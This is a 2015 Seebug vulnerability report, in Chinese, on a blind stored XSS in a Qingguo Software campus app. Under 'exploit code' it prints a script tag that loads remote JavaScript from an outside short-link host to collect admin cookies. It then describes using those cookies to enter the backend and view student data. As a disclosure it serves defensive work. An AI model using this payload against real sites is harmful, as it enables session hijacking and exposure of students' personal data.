青果软件手机APP掌上校园某处XSS盲打以打到后台和cookies

2015-11-10T00:00:00
ID SSV:95374
Type seebug
Reporter Root
Modified 2015-11-10T00:00:00

Description

简要描述:

提交的没通过,说是要完整的问题复现也是醉了。。。。。在提交一次

详细说明:

漏洞利用代码:

<script src=http://t.cn/RUUNjzh></script>

<img src="https://images.seebug.org/upload/201511/101332027be52a70f1fa959e95be041b78629790.png" alt="IC_E5%SEZU3{PLSB@ET39RO.png" width="600" onerror="javascript:errimg(this);">

这是同IP的网站的确隶属于湖南青果软件有限公司:

<img src="https://images.seebug.org/upload/201511/1013403548187a4b752ef0eb97daded8f6ae6ad3.png" alt="3Q)YC4SLH43EZYSC@E)7X$P.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201511/1013405368710c0ed012ddd7a3b75176eccf4d11.png" alt="XKO@WZG_4RPOYC`JHLFDYV9.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

漏洞证明

[<img src="https://images.seebug.org/upload/201511/10134224bd66a963107fa470e0aa691c9bc478f3.png" alt="3NTQQ0B71B1%Y)O6L1R%3V.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201511/101343187fd9a31ae8eea7f5a2741542d3ac7281.png" alt="}Y@VEB$}PP@[U]7285F%X.png" width="600" onerror="javascript:errimg(this);">

以使用cookies登录后台界面看到学生数据:

<img src="https://images.seebug.org/upload/201511/10134404ef5db826da6cb4f16380e7faa06b47db.png" alt="})ME3D~A~}NA(U9ZK%T%NGU.png" width="600" onerror="javascript:errimg(this);">

这个是我昨天提交的漏洞代码源代码可以清楚的看见成功插入的XSS code:

[<img src="https://images.seebug.org/upload/201511/10134823410ad6a77e41e49ee2b87237eea5569c.png" alt="1GSY}}XJ73WK]XRLGQTTKM4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201511/10134823410ad6a77e41e49ee2b87237eea5569c.png)